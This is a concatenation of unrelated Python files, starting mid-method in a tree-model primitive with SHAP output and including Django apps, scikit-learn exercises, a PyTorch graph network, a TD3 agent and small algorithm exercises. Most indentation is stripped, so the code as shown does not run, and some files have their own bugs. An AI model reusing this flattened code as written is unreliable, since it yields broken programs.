inputs = inputs.select_dtypes(include="number")
col_diff = num_cols - inputs.shape[1]
if col_diff > 0:
logger.warn(f"Removed {col_diff} unencoded columns from produce data.")
# create dataframe to hold the result
result = self._model.predict(inputs.values)
if len(self._target_cols) > 1:
result_df = container.DataFrame()
for i, c in enumerate(self._target_cols):
col = container.DataFrame({c: result[:, i]})
result_df = pd.concat([result_df, col], axis=1)
for c in range(result_df.shape[1]):
result_df.metadata = result_df.metadata.add_semantic_type(
(metadata_base.ALL_ELEMENTS, c), "http://schema.org/Float"
)
else:
result_df = container.DataFrame(
{self._target_cols[0]: result}, generate_metadata=True
)
# if we mapped values earlier map them back.
if len(self._label_map) > 0:
# TODO label map will not work if there are multiple output columns.
result_df[self._target_cols[0]] = result_df[self._target_cols[0]].map(
self._label_map
)
# mark the semantic types on the dataframe
for i, _ in enumerate(result_df.columns):
result_df.metadata = result_df.metadata.add_semantic_type(
(metadata_base.ALL_ELEMENTS, i),
"https://metadata.datadrivendiscovery.org/types/PredictedTarget",
)
if (
self._model.mode == "classification"
and self.hyperparams["compute_confidences"]
):
confidence = self._model.predict_proba(inputs.values)
if self._binary:
pos_column = (
0 if self.hyperparams["pos_label"] == self._label_map[0] else 1
)
result_df.insert(
result_df.shape[1], "confidence", confidence[:, pos_column]
)
result_df.metadata = result_df.metadata.add_semantic_type(
(metadata_base.ALL_ELEMENTS, len(result_df.columns) - 1),
"http://schema.org/Float",
)
else:
# add confidence scores as some metrics require them.
confidence = pd.Series(confidence.tolist(), name="confidence")
result_df = pd.concat([result_df, confidence], axis=1)
confidences = [
item
for sublist in result_df["confidence"].values.tolist()
for item in sublist
]
labels = np.array(list(self._label_map.values()) * len(result_df))
index = [
item
for sublist in [
[i] * len(np.unique(labels)) for i in result_df.index
]
for item in sublist
]
result_df_temp = container.DataFrame()
result_df_temp["Class"] = labels
result_df_temp["confidence"] = confidences
result_df_temp.metadata = result_df.metadata
result_df_temp["index_temp"] = index
result_df_temp = result_df_temp.set_index("index_temp")
result_df = result_df_temp
result_df.metadata = result_df.metadata.add_semantic_type(
(metadata_base.ALL_ELEMENTS, len(result_df.columns) - 1),
"https://metadata.datadrivendiscovery.org/types/FloatVector",
)
result_df.metadata = result_df.metadata.add_semantic_type(
(metadata_base.ALL_ELEMENTS, len(result_df.columns) - 1),
"https://metadata.datadrivendiscovery.org/types/Score",
)
result_df.metadata = result_df.metadata.add_semantic_type(
(metadata_base.ALL_ELEMENTS, len(result_df.columns) - 1),
"https://metadata.datadrivendiscovery.org/types/PredictedTarget",
)
logger.debug(f"\n{result_df}")
return base.CallResult(result_df)
def produce_feature_importances(
self,
*,
inputs: container.DataFrame,
timeout: float = None,
iterations: int = None,
) -> CallResult[container.DataFrame]:
logger.debug(f"Producing {__name__} feature weights")
        # force a fit if it hasn't yet been done
if self._needs_fit:
self.fit()
# extract the feature weights
output = container.DataFrame(
self._model.feature_importances().reshape((1, len(inputs.columns))),
generate_metadata=True,
)
output.columns = inputs.columns
for i in range(len(inputs.columns)):
output.metadata = output.metadata.update_column(
i, {"name": output.columns[i]}
)
# map component columns back to their source - this would cover things like
# a one hot encoding column, that is derived from some original source column
source_col_importances: Dict[str, float] = {}
for col_idx in range(0, len(output.columns)):
col_dict = dict(
inputs.metadata.query((metadata_base.ALL_ELEMENTS, col_idx))
)
# if a column points back to a source column, add that columns importance to the
# total for that source column
if "source_column" in col_dict:
source_col = col_dict["source_column"]
if source_col not in source_col_importances:
source_col_importances[source_col] = 0.0
source_col_importances[source_col] += output.iloc[:, col_idx]
for source_col, importance in source_col_importances.items():
# add the source columns and their importances to the returned data
output_col_length = len(output.columns)
output.insert(output_col_length, source_col, importance, True)
output.metadata = output.metadata.update_column(
output_col_length, {"name": source_col}
)
return CallResult(output)
def produce_shap_values(
self,
*,
inputs: container.DataFrame,
timeout: float = None,
iterations: int = None,
) -> CallResult[container.DataFrame]:
if self._needs_fit:
self.fit()
# don't want to produce SHAP predictions on train set because too computationally intensive
check_rows = min(self._input_hash.shape[0], inputs.shape[0])
if (
pd.util.hash_pandas_object(inputs.head(check_rows))
== self._input_hash.head(check_rows)
).all():
logger.info(
"Not producing SHAP interpretations on train set because of computational considerations"
)
return CallResult(container.DataFrame([]))
# drop any non-numeric columns
num_cols = inputs.shape[1]
inputs = inputs.select_dtypes(include="number")
col_diff = num_cols - inputs.shape[1]
if col_diff > 0:
logger.warn(f"Removed {col_diff} unencoded columns.")
explainer = shap.TreeExplainer(self._model._models[0].model)
max_size = self.hyperparams["shap_max_dataset_size"]
if inputs.shape[0] > max_size:
logger.warning(
f"There are more than {max_size} rows in dataset, sub-sampling ~{max_size} approximately representative rows "
+ "on which to produce interpretations"
)
df = self._shap_sub_sample(inputs)
shap_values = explainer.shap_values(df)
else:
shap_values = explainer.shap_values(pd.DataFrame(inputs))
if self._model.mode == "classification":
logger.info(
f"Returning interpretability values offset from most frequent class in dataset"
)
shap_values = shap_values[np.argmax(explainer.expected_value)]
output_df = container.DataFrame(shap_values, generate_metadata=True)
for i, col in enumerate(inputs.columns):
output_df.metadata = output_df.metadata.update_column(i, {"name": col})
component_cols: Dict[str, List[int]] = {}
for c in range(0, len(output_df.columns)):
col_dict = dict(inputs.metadata.query((metadata_base.ALL_ELEMENTS, c)))
if "source_column" in col_dict:
src = col_dict["source_column"]
if src not in component_cols:
component_cols[src] = []
component_cols[src].append(c)
# build the source column values and add them to the output
for s, cc in component_cols.items():
src_col = output_df.iloc[:, cc].apply(lambda x: sum(x), axis=1)
src_col_index = len(output_df.columns)
output_df.insert(src_col_index, s, src_col)
output_df.metadata = output_df.metadata.add_semantic_type(
(metadata_base.ALL_ELEMENTS, src_col_index),
"https://metadata.datadrivendiscovery.org/types/Attribute",
)
df_dict = dict(output_df.metadata.query((metadata_base.ALL_ELEMENTS,)))
df_dict_1 = dict(output_df.metadata.query((metadata_base.ALL_ELEMENTS,)))
df_dict["dimension"] = df_dict_1
df_dict_1["name"] = "columns"
df_dict_1["semantic_types"] = (
"https://metadata.datadrivendiscovery.org/types/TabularColumn",
)
df_dict_1["length"] = len(output_df.columns)
output_df.metadata = output_df.metadata.update(
(metadata_base.ALL_ELEMENTS,), df_dict
)
return CallResult(output_df)
def _shap_sub_sample(self, inputs: container.DataFrame):
df = pd.DataFrame(inputs)
df["cluster_assignment"] = (
KMeans(random_state=self.random_seed).fit_predict(df).astype(int)
)
n_classes = df["cluster_assignment"].unique()
# deal with cases in which the predictions are all one class
if len(n_classes) == 1:
return df.sample(self.hyperparams["shap_max_dataset_size"]).drop(
columns=["cluster_assignment"]
)
else:
proportion = round(
self.hyperparams["shap_max_dataset_size"] / len(n_classes)
)
dfs = []
for i in n_classes:
# dealing with classes that have less than or equal to their proportional representation
if df[df["cluster_assignment"] == i].shape[0] <= proportion:
dfs.append(df[df["cluster_assignment"] == i])
else:
dfs.append(
df[df["cluster_assignment"] == i].sample(
proportion, random_state=self.random_seed
)
)
sub_sample_df = pd.concat(dfs)
return sub_sample_df.drop(columns=["cluster_assignment"])
def get_params(self) -> Params:
return Params(
model=self._model,
target_cols=self._target_cols,
label_map=self._label_map,
needs_fit=self._needs_fit,
input_hash=self._input_hash,
binary=self._binary,
)
def set_params(self, *, params: Params) -> None:
self._model = params["model"]
self._target_cols = params["target_cols"]
self._label_map = params["label_map"]
self._needs_fit = params["needs_fit"]
self._input_hash = params["input_hash"]
self._binary = params["binary"]
return
|
from rubicon_ml import domain
from rubicon_ml.client import Dataframe
def test_properties(project_client):
parent = project_client
domain_dataframe = domain.Dataframe(
description="some description", tags=["x"], name="test title"
)
dataframe = Dataframe(domain_dataframe, parent)
assert dataframe.id == domain_dataframe.id
assert dataframe.name == domain_dataframe.name
assert dataframe.description == domain_dataframe.description
assert dataframe.tags == domain_dataframe.tags
assert dataframe.created_at == domain_dataframe.created_at
assert dataframe.parent == parent
def test_get_data(project_client, test_dataframe):
parent = project_client
df = test_dataframe
logged_df = parent.log_dataframe(df)
assert logged_df.get_data().compute().equals(df.compute())
|
#!/usr/bin/env python
import sys
import os
import os.path as osp
import numpy as np
from random import randrange, choice
import json
from capsul.api import get_process_instance
# Make sure that python directory is in sys.path
python = osp.join(osp.dirname(osp.dirname(sys.argv[0])), 'python')
if python not in sys.path:
sys.path.append(python)
array_size = (10, 10)
subjects = ['evie', 'claud', 'bulah', 'letta', 'irvine', 'len', 'jay',
'verne', 'brain', 'walton', 'audrey', 'terrill', 'alden',
'madie', 'fallon', 'rohan', 'bryanna', 'eloise', 'brenton',
'nanie', 'dominiqu', 'claudio', 'garland', 'bridie', 'claribel',
'kathlyn', 'trenton', 'el', 'hortenci', 'latonia', 'jacoby',
'destinee', 'genoveva', 'britni', 'paulene', 'elvera', 'yoshiko',
'wellingt', 'dane', 'maximino', 'deana', 'faron', 'frederic',
'billye', 'donovan', 'thora', 'sussie', 'elouise', 'nadia',
'eboni', 'lucero', 'jere', 'giselle', 'mossie', 'chastity',
'harold', 'dandre', 'robby', 'tammy', 'nils', 'darrien', 'leisa',
'webster', 'leroy', 'alexis', 'trevor', 'exie', 'rayshawn',
'edsel', 'hampton', 'lawson', 'mozella', 'isabella', 'leilani',
'lovie', 'waldo', 'donte', 'delpha', 'pamela', 'tyrel', 'dillard',
'mannie', 'amelia', 'misti', 'lorelei', 'clara', 'maymie',
'derrell', 'cooper', 'latoya', 'aliyah', 'merlene', 'dequan',
'lissa', 'domenica', 'gerald', 'melville', 'glendon', 'garland',
'alycia']
group_names = ['sinusoidally', 'enfold', 'helmholtzian', 'anacardium', 'amyelencephalic']
center_names = ['lasagna', 'ruby', 'compter']
output_dir = sys.argv[1]
# Create groups
groups = {}
group_size = len(subjects)/len(group_names)
for i in range(len(group_names)):
groups[group_names[i]] = subjects[i*group_size : (i+1)*group_size]
del group_names
del i
# Generate one random template mask per group
for group in groups:
mask = np.zeros(array_size)
xmin = randrange(array_size[0])
xmax = randrange(xmin,array_size[0])
ymin = randrange(array_size[1])
ymax = randrange(ymin,array_size[1])
mask[xmin:xmax, ymin:ymax] = 1
mask_json = {
'group_name': group,
'group_subjects': groups[group],
}
mask_dir = osp.join(output_dir, 'share', 'template_masks')
if not osp.exists(mask_dir):
os.makedirs(mask_dir)
mask_file = osp.join(mask_dir, '%s.npy' % group)
np.save(mask_file, mask)
json_file = osp.join(mask_dir, '%s.json' % group)
json.dump(mask_json, open(json_file,'w'))
# Generate one data file per subject
center_per_subject = {}
for subject in subjects:
array = np.random.random(array_size)
center = choice(center_names)
center_per_subject[subject] = center
subject_json = dict(
subject_code=subject,
center_code=center)
file = '{output}/database/random_matrix/{center}/{subject}/{subject}'.format(output=output_dir,
center=center,
subject=subject)
dir = osp.dirname(file)
if not osp.exists(dir):
os.makedirs(dir)
np.save(file + '.npy', array)
    json.dump(subject_json, open(file + '.json', 'w'))
# Generate results
for group in groups:
subjects = groups[group]
input_files = ['{output}/database/random_matrix/{center}/{subject}/{subject}.npy'.format(output=output_dir,
center=center_per_subject[subject],
subject=subject)
for subject in subjects]
template_mask = '{output}/share/template_masks/{group}.npy'.format(output=output_dir,
group=group)
threshold = 0.5
averages_sup = ['{output}/database/group_average/{center}/{subject}/{subject}_avg_sup.npy'.format(output=output_dir,
center=center_per_subject[subject],
subject=subject)
for subject in subjects]
averages_inf = ['{output}/database/group_average/{center}/{subject}/{subject}_avg_inf.npy'.format(output=output_dir,
center=center_per_subject[subject],
subject=subject)
for subject in subjects]
group_average_sup = '{output}/database/group_average/{group}_sup.npy'.format(output=output_dir,
group=group)
group_average_inf = '{output}/database/group_average/{group}_inf.npy'.format(output=output_dir,
group=group)
pipeline = get_process_instance('bv_capsul_ex.ex_processes.GroupAveragePipeline',
input_files=input_files,
template_mask = template_mask,
threshold=threshold,
averages_sup=averages_sup,
averages_inf=averages_inf,
group_average_sup=group_average_sup,
group_average_inf=group_average_inf)
print 'Running group pipeline for group', group
pipeline.run()
|
from django.shortcuts import render_to_response
from django.template import RequestContext
def e_handler404(request):
context = RequestContext(request)
    response = render_to_response('404.html', context.flatten())
response.status_code = 404
return response
|
# -*- encoding: ms949 -*-
from sklearn.model_selection import LeaveOneOut
from sklearn.model_selection import cross_val_score
from sklearn.datasets import load_iris
from sklearn.linear_model import LogisticRegression
iris = load_iris()
logreg = LogisticRegression()
loo = LeaveOneOut()
scores = cross_val_score(logreg, iris.data, iris.target, cv=loo)
print("cv spilt count: ", len(scores)) #교차 검증 분할 횟수
print("mean of accuracy: {:.2f}".format(scores.mean()))
|
# Generated by Django 3.2.6 on 2021-08-21 15:43
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('nostaldja', '0001_initial'),
]
operations = [
migrations.RenameField(
model_name='fad',
old_name='img_url',
new_name='image_url',
),
]
|
from objectBase import ObjectBase
class Lane(ObjectBase):
def __init__(self, id_=None, parent_object=None, lights=None):
super().__init__(id_=id_, parent_object=parent_object)
self.queue = []
self.lights = lights
def is_incoming(self):
        return not self.outgoing
def add_to_queue(self, object_):
"""Method adds object (car) to queue"""
self.queue.append(object_)
def get_first_car(self):
"""Method returns first car from queue or None if not available."""
try:
car = self.queue[0]
return car
except IndexError:
return None
def get_lights(self):
"""Method returns traffic lights for current lane"""
return self.lights
def get_queue(self):
"""Method returns all cars currently awaiting in queue"""
return self.queue
def remove_first_car(self):
"""Method removes and returns first car from queue or None if not available."""
try:
car = self.queue.pop(0)
return car
except IndexError:
return None
|
from django.shortcuts import render
from .models import job
def home(request):
Job = job.objects
return render(request,'jobs/home.html',{"Job":Job})
def app(request):
return render(request,'jobs/app.html')
|
# RachelPotter.py
# A program that changes the lowercase names in a .txt file to uppercase and prints them to a new file
def main():
infile_name = "Before.txt"
outfile_name = "After.txt"
infile = open(infile_name, "r")
outfile = open(outfile_name, "w")
for row in infile:
for letter in row:
cap_name = letter.capitalize()
print(cap_name, end="", file=outfile)
infile.close()
outfile.close()
print("Capitalized names have been written to:", outfile_name)
main()
# I pledge my honor that I have abided by the Stevens Honor System
# Rachel Potter
|
from django.db import models
from django.contrib.auth.models import User
from products.models import Products
CHAT_TYPES = (
(0, 'pending'),
(1, 'sent')
)
class Order(models.Model):
user = models.ForeignKey(User)
# shopping_address
city = models.CharField(
max_length=20)
phone = models.CharField(
max_length=15)
    country = models.CharField(
max_length=20)
amount = models.FloatField()
created_at = models.DateTimeField()
status = models.IntegerField(choices=CHAT_TYPES)
def __unicode__(self):
return self.user.first_name
class OrderToProduct(models.Model):
order = models.ForeignKey(Order)
product = models.ForeignKey(Products)
|
import numpy as np
import torch
import torch.nn as nn
import torch.nn.init as init
import torch.nn.functional as F
import math
from torch.autograd import Variable
import torch.utils.model_zoo as model_zoo
class input_data(object):
def __init__(self, G):
        # Expected fields (to be filled from the graph G elsewhere):
        self.onehot = None  # Tensor (num_nodes * input_dim), one hot from dict
        self.index1 = None  # Long Tensor (num_pairs) (source)
        self.index2 = None  # Long Tensor (num_pairs) (target)
        self.mat = None     # Tensor for index add (num_nodes * num_pairs)
class ForwardBlock(nn.Module):
def __init__(self, input_dim, output_dim, nLayers=2, bias=False):
super(ForwardBlock, self).__init__()
self.linear = nn.ModuleList()
self.bn = nn.ModuleList()
self.relu = nn.ModuleList()
self.nLayers = nLayers
for i in range(nLayers):
if i == 0: l = input_dim
else: l = output_dim
self.linear.append(nn.Linear(l, output_dim, bias))
self.bn.append(nn.BatchNorm1d(output_dim))
self.relu.append(nn.ReLU(inplace=True))
init.kaiming_normal(self.linear[-1].weight)
def forward(self, x):
for i in range(self.nLayers):
x = self.linear[i](x)
x = self.bn[i](x)
x = self.relu[i](x)
return x
class FullyConnectedNet(nn.Module):
def __init__(self, *layers):
'''
layers : list of int
There are dimensions in the sequence
'''
super(FullyConnectedNet, self).__init__()
self.linear = nn.ModuleList()
self.bn = nn.ModuleList()
self.relu = nn.ModuleList()
pre_dim = layers[0]
self.nLayers = 0
for dim in layers[1:]:
self.linear.append(nn.Linear(pre_dim, dim, bias=False))
self.bn.append(nn.BatchNorm1d(dim))
self.relu.append(nn.ReLU(inplace=True))
init.kaiming_normal(self.linear[-1].weight)
self.nLayers += 1
pre_dim = dim
def forward(self, x):
for i in range(self.nLayers):
x = self.linear[i](x)
x = self.bn[i](x)
x = self.relu[i](x)
return x
def maxpoolcat(x1, x2):
x1 = x1.max(0)[0]
x2 = x2.max(0)[0]
x = torch.cat((x1, x2), 1) #TODO Jan -- axis was 1 instead of 0
return x
def concat_em_uc(stmt, conj):
stmt = stmt.max(0)[0]
conj = conj.max(0)[0]
cov = stmt * conj
x = torch.cat((cov, conj), 1)
return x
def em(stmt, conj):
stmt = stmt.max(0)[0]
conj = conj.max(0)[0]
cov = stmt * conj
return cov
def dot_max(x1, x2):
return torch.mm(x1, x2.t()).max()
def dot_mean(x1, x2):
return torch.mm(x1, x2.t()).mean()
def meanpoolcat(x1, x2):
x1 = x1.mean(0)
x2 = x2.mean(0)
x = torch.cat((x1, x2), 1)
return x
def maxpoolpair(conj, stmt):
conj = conj.max(0)[0]
conj = conj.repeat(stmt.size()[0], 1)
return torch.cat((conj, stmt), 1)
class GraphNet(nn.Module):
def __init__(self,
input_dim,
nFeats,
nLayers,
block='normal',
depth=2,
bias=False,
short_cut=False,
direction=False,
loss=None,
binary=False,
no_step_supervision=False,
tied_weight=False,
compatible=False): # compatible is used to run old model
super(GraphNet, self).__init__()
self.no_step_supervision = no_step_supervision
self.input_dim = input_dim
self.nFeats = nFeats
self.nLayers = nLayers
self.step = nn.ModuleList()
self.relu = nn.ReLU(inplace=True)
if compatible:
self.l1 = nn.Linear(input_dim, nFeats, bias=False)
else:
self.l1 = nn.Embedding(input_dim, nFeats, sparse=False)
init.kaiming_normal(self.l1.weight)
self.l2 = nn.ModuleList()
self.bn = nn.BatchNorm1d(nFeats)
self.short_cut = short_cut
self.direction = direction
self.binary = binary
if loss == 'pair':
self.pair_forward = PairForward(2 * nFeats, nFeats, nFeats // 2,
nFeats // 2)
if self.direction or self.binary:
self.step_out = nn.ModuleList()
if self.binary:
self.step_binary = nn.ModuleList()
self.tied_weight = tied_weight
if tied_weight:
self.step = block_dict[block](nFeats * 2, nFeats, depth, bias)
if self.direction or self.binary:
self.step_out = block_dict[block](nFeats * 2, nFeats, depth, bias)
if self.binary:
self.step_binary = block_dict[block](nFeats*3, nFeats*3, depth, bias)
if short_cut:
self.l2 = block_dict[block](nFeats, nFeats, 1 , bias)
else:
for i in range(nLayers):
self.step.append(block_dict[block](nFeats * 2, nFeats, depth, bias))
if self.direction or self.binary:
self.step_out.append(
block_dict[block](nFeats * 2, nFeats, depth, bias))
if self.binary:
self.step_binary.append(block_dict[block](nFeats*3, nFeats*3, depth, bias))
if short_cut and i < nLayers-1:
self.l2.append(block_dict[block](nFeats, nFeats, 1 , bias))
def forward(self, data, conj=None):
# [onehot , index1 , index2 , mat]
# if self.direction == true:
# [onehot, iindex1, iindex2, imat, oindex1, oindex2, omat]
#print (len(data))
x = self.l1(data[0])
x = self.bn(x)
x = self.relu(x)
if self.no_step_supervision:
out = None
else:
out = [x]
if self.tied_weight:
for i in range(self.nLayers):
if conj is not None:
z = torch.cat((x, conj), 0)
else:
z = x
y = self.step(torch.cat((z[data[1]], z[data[2]]), 1))
z = torch.mm(data[3], y)
if self.direction or self.binary:
y_out = self.step_out(torch.cat((x[data[4]], x[data[5]]), 1))
z_out = torch.mm(data[6], y_out)
z = z + z_out
if self.binary and data[7].size()[0] > 1:
y_bi = self.step_binary(torch.cat( (x[data[7][0] ], x[data[7][1] ], x[data[7][2] ]) , 1))
z_bi = torch.mm(data[8], y_bi.view(-1 , self.nFeats))
z = z + z_bi
if self.no_step_supervision:
out = [z]
else:
out.append(z)
if self.short_cut and i < self.nLayers-1:
x = x + z
x = self.l2(x)
else:
x = z
else:
for i in range(self.nLayers):
if conj is not None:
z = torch.cat((x, conj), 0)
else:
z = x
y = self.step[i](torch.cat((z[data[1]], z[data[2]]), 1))
z = torch.mm(data[3], y)
if self.direction or self.binary:
y_out = self.step_out[i](torch.cat((x[data[4]], x[data[5]]), 1))
z_out = torch.mm(data[6], y_out)
z = z + z_out
if self.binary and data[7].size()[0] > 1:
y_bi = self.step_binary[i](torch.cat( (x[data[7][0] ], x[data[7][1] ], x[data[7][2] ]) , 1))
z_bi = torch.mm(data[8], y_bi.view(-1 , self.nFeats))
z = z + z_bi
if self.no_step_supervision:
out = [z]
else:
out.append(z)
if self.short_cut and i < self.nLayers-1:
x = x + z
x = self.l2[i](x)
else:
x = z
return out
class PairForward(nn.Module):
def __init__(self, nFeats_in, nFeats1, nFeats2, nFeats_out, bias=False):
super(PairForward, self).__init__()
self.l1 = nn.Linear(nFeats_in, nFeats1, bias=bias)
init.kaiming_normal(self.l1.weight)
self.bn1 = nn.BatchNorm1d(nFeats1)
self.relu1 = nn.ReLU(inplace=True)
self.l2 = nn.Linear(nFeats1, nFeats2, bias=bias)
init.kaiming_normal(self.l2.weight)
self.bn2 = nn.BatchNorm1d(nFeats2)
self.relu2 = nn.ReLU(inplace=True)
self.l3 = nn.Linear(nFeats2, nFeats_out, bias=bias)
init.kaiming_normal(self.l3.weight)
self.bn3 = nn.BatchNorm1d(nFeats_out)
self.relu3 = nn.ReLU(inplace=True)
def forward(self, data):
x = self.l1(data)
x = self.bn1(x)
x = self.relu1(x)
x = self.l2(x)
x = self.bn2(x)
x = self.relu2(x)
x = self.l3(x)
x = self.bn3(x)
x = self.relu3(x)
return x.max(0)[0]
block_dict = {'normal': ForwardBlock}
|
import numpy as np
import torch
import gym
import torch.nn.functional as F
from termcolor import cprint
from flare.qpolgrad import BaseQPolicyGradient
import flare.kindling as fk
from flare.kindling import ReplayBuffer
from typing import Optional, Union, Callable
from itertools import chain
class TD3(BaseQPolicyGradient):
def __init__(
self,
env_fn: Callable,
actorcritic: Callable = fk.FireTD3ActorCritic,
seed: Optional[int] = 0,
steps_per_epoch: Optional[int] = 4000,
replay_size: Optional[int] = int(1e6),
gamma: Optional[float] = 0.99,
polyak: Optional[float] = 0.95,
pol_lr: Optional[float] = 1e-3,
q_lr: Optional[float] = 1e-3,
hidden_sizes: Optional[Union[tuple, list]] = (256, 128),
bs: Optional[int] = 100,
warmup_steps: Optional[int] = 10000,
update_after: Optional[int] = 1000,
update_every: Optional[int] = 50,
act_noise: Optional[float] = 0.1,
noise_clip: Optional[float] = 0.5,
policy_delay: Optional[int] = 2,
target_noise: Optional[float] = 0.2,
        buffer: Optional[Callable] = ReplayBuffer,
save_freq: Optional[int] = 1,
state_preproc: Optional[Callable] = None,
state_sze: Optional[Union[int, tuple]] = None,
logger_dir: Optional[str] = None,
tensorboard: Optional[bool] = True,
save_states: Optional[bool] = False,
save_screen: Optional[bool] = False,
):
super().__init__(
env_fn,
actorcritic,
seed=seed,
steps_per_epoch=steps_per_epoch,
replay_size=replay_size,
gamma=gamma,
polyak=polyak,
pol_lr=pol_lr,
q_lr=q_lr,
hidden_sizes=hidden_sizes,
bs=bs,
warmup_steps=warmup_steps,
update_after=update_after,
update_every=update_every,
act_noise=act_noise,
save_freq=save_freq,
buffer=buffer,
state_preproc=state_preproc,
state_sze=state_sze,
logger_dir=logger_dir,
tensorboard=tensorboard,
save_states=save_states,
save_screen=save_screen,
)
self.target_noise = target_noise
self.noise_clip = noise_clip
self.policy_delay = policy_delay
def setup_optimizers(self, pol_lr, q_lr):
self.policy_optimizer = torch.optim.Adam(self.ac.policy.parameters(), lr=pol_lr)
self.q_params = chain(self.ac.qfunc1.parameters(), self.ac.qfunc2.parameters())
self.q_optimizer = torch.optim.Adam(self.q_params, lr=q_lr)
def calc_policy_loss(self, data):
o = data["obs"]
q1_pi = self.ac.qfunc1(o, self.ac.policy(o))
return -q1_pi.mean()
def calc_qfunc_loss(self, data):
o, a, r, o2, d = (
data["obs"],
data["act"],
data["rew"],
data["obs2"],
data["done"],
)
q1 = self.ac.qfunc1(o, a)
q2 = self.ac.qfunc2(o, a)
# Bellman backup for Q functions
with torch.no_grad():
pi_targ = self.ac_targ.policy(o2)
# Target policy smoothing
epsilon = torch.randn_like(pi_targ) * self.target_noise
epsilon = torch.clamp(epsilon, -self.noise_clip, self.noise_clip)
a2 = pi_targ + epsilon
a2 = torch.clamp(a2, -self.act_limit, self.act_limit)
# Target Q-values
q1_pi_targ = self.ac_targ.qfunc1(o2, a2)
q2_pi_targ = self.ac_targ.qfunc2(o2, a2)
q_pi_targ = torch.min(q1_pi_targ, q2_pi_targ)
backup = r + self.gamma * (1 - d) * q_pi_targ
# MSE loss against Bellman backup
loss_q1 = ((q1 - backup) ** 2).mean()
loss_q2 = ((q2 - backup) ** 2).mean()
loss_q = loss_q1 + loss_q2
# Useful info for logging
loss_info = dict(Q1Values=q1.detach().numpy(), Q2Values=q2.detach().numpy())
return loss_q, loss_info
def update(self, data, timer):
# First run one gradient descent step for Q1 and Q2
self.q_optimizer.zero_grad()
loss_q, loss_info = self.calc_qfunc_loss(data)
loss_q.backward()
self.q_optimizer.step()
# Record things
self.logger.store(QLoss=loss_q.item(), **loss_info)
# Possibly update pi and target networks
if timer % self.policy_delay == 0:
# Freeze Q-networks so you don't waste computational effort
# computing gradients for them during the policy learning step.
for p in self.q_params:
p.requires_grad = False
# Next run one gradient descent step for pi.
self.policy_optimizer.zero_grad()
loss_pi = self.calc_policy_loss(data)
loss_pi.backward()
self.policy_optimizer.step()
# Unfreeze Q-networks so you can optimize it at next DDPG step.
for p in self.q_params:
p.requires_grad = True
# Record things
self.logger.store(PolicyLoss=loss_pi.item())
# Finally, update target networks by polyak averaging.
with torch.no_grad():
for p, p_targ in zip(self.ac.parameters(), self.ac_targ.parameters()):
# NB: We use an in-place operations "mul_", "add_" to update target
# params, as opposed to "mul" and "add", which would make new tensors.
p_targ.data.mul_(self.polyak)
p_targ.data.add_((1 - self.polyak) * p.data)
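                # For reference, the two in-place ops above implement polyak averaging:
                #   theta_targ <- polyak * theta_targ + (1 - polyak) * theta
                # so with the default polyak=0.95 the target networks trail the online
                # networks slowly, stabilizing the bootstrapped Q targets.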
def logger_tabular_to_dump(self):
self.logger.log_tabular("Q1Values", with_min_and_max=True)
self.logger.log_tabular("Q2Values", with_min_and_max=True)
self.logger.log_tabular("PolicyLoss", average_only=True)
self.logger.log_tabular("QLoss", average_only=True)
|
# -*- encoding: ms949 -*-
import numpy as np
import matplotlib.pylab as plt
rnd = np.random.RandomState(0)
X_org = rnd.normal(size=(1000, 3))
w = rnd.normal(size=3)
X = rnd.poisson(10 * np.exp(X_org))
y = np.dot(X_org, w)
print(X[:10, 0])
print("feature count:\n{}".format(
np.bincount(X[:, 0].astype('int'))))
plt.xlim(0, 160)
plt.ylim(0, 70)
bins = np.bincount(X[:, 0])
plt.bar(range(len(bins)), bins, color='grey')
plt.ylabel("count") #출현회수
plt.xlabel("value") #값
plt.show()
from sklearn.linear_model import Ridge
from sklearn.model_selection import train_test_split
X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=0)
score = Ridge().fit(X_train, y_train).score(X_test, y_test)
print("test score: {:.3f}".format(score))
#log scale
X_train_log = np.log(X_train + 1)
X_test_log = np.log(X_test + 1)
plt.hist(X_train_log[:,0], bins=25, color='gray')
plt.ylabel("count")
plt.xlabel("value")
plt.show()
score = Ridge().fit(X_train_log, y_train).score(X_test_log, y_test)
print("test score:{:.3f}".format(score))
|
# Problem name: Increasing Array
# Description: You are given an array of n integers.
# You want to modify the array so that it is increasing, i.e., every element is at least as large as the previous element.
# On each turn, you may increase the value of any element by one. What is the minimum number of turns required?
# Strategy: scan from index 1 and check whether each element is at least as large as its predecessor;
# if not, add the difference to the running count and raise the element in place so later comparisons stay correct.
l=int(input())
li=list(map(int,input().split()))
count=0
for i in range(1,l):
if(li[i]>=li[i-1]):
continue
else:
m=li[i-1]-li[i]
count+=m
li[i]+=m
print(count)
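# A small worked example (hypothetical input, not part of the problem statement):
# for n=5 and the array [3, 2, 5, 1, 7], the loop raises 2 -> 3 (cost 1) and
# 1 -> 5 (cost 4), so the program would print 5.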
|
class Solution:
# @param A : tuple of integers
# @return an integer
def longestSubsequenceLength(self, A):
inc = [1] * len(A)
dec = inc[:]
for i in range(1, len(A)):
for j in range(0, i):
if A[j] < A[i]:
inc[i] = max(inc[i], inc[j] + 1)
for i in range(len(A) - 2, -1, -1):
for j in range(len(A) - 1, i, -1):
if A[j] < A[i]:
dec[i] = max(dec[i], dec[j] + 1)
longest = 0
for i in range(len(A)):
longest = max(longest, inc[i] + dec[i] - 1)
return longest
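# Hypothetical usage sketch (the class targets an InterviewBit-style judge, so
# this call is illustrative only):
# Solution().longestSubsequenceLength((1, 11, 2, 10, 4, 5, 2, 1)) would return 6,
# e.g. the longest bitonic subsequence 1, 2, 10, 4, 2, 1.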
|
import requests
from django.db import models
from sources.models import CryptoExchange
class Cryptocurrency(models.Model):
base = models.CharField(max_length=10)
quote = models.CharField(max_length=10)
symbol = models.CharField(max_length=20)
exchange = models.ForeignKey(CryptoExchange, on_delete=models.CASCADE,)
bid = models.FloatField(default = None, null = True)
ask = models.FloatField(default = None, null = True)
last = models.FloatField(default = None, null = True)
base_volume = models.FloatField(default = None, null = True)
quote_volume = models.FloatField(default = None, null = True)
last_updated = models.DateTimeField(default = None, null = True)
def __str__(self):
return self.base + self.quote
def update_data(self):
ticker_data = requests.get('https://api.hitbtc.com/api/2/public/ticker/' + self.symbol.upper()).json()
self.bid = float(ticker_data["bid"])
self.ask = float(ticker_data["ask"])
self.last = float(ticker_data["last"])
self.base_volume = float(ticker_data["volume"])
self.quote_volume = float(ticker_data["volumeQuote"])
self.save()
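# Hypothetical usage sketch (assumes a row with this symbol already exists and
# that the HitBTC v2 public ticker endpoint used above is reachable):
# pair = Cryptocurrency.objects.get(symbol="btcusd")
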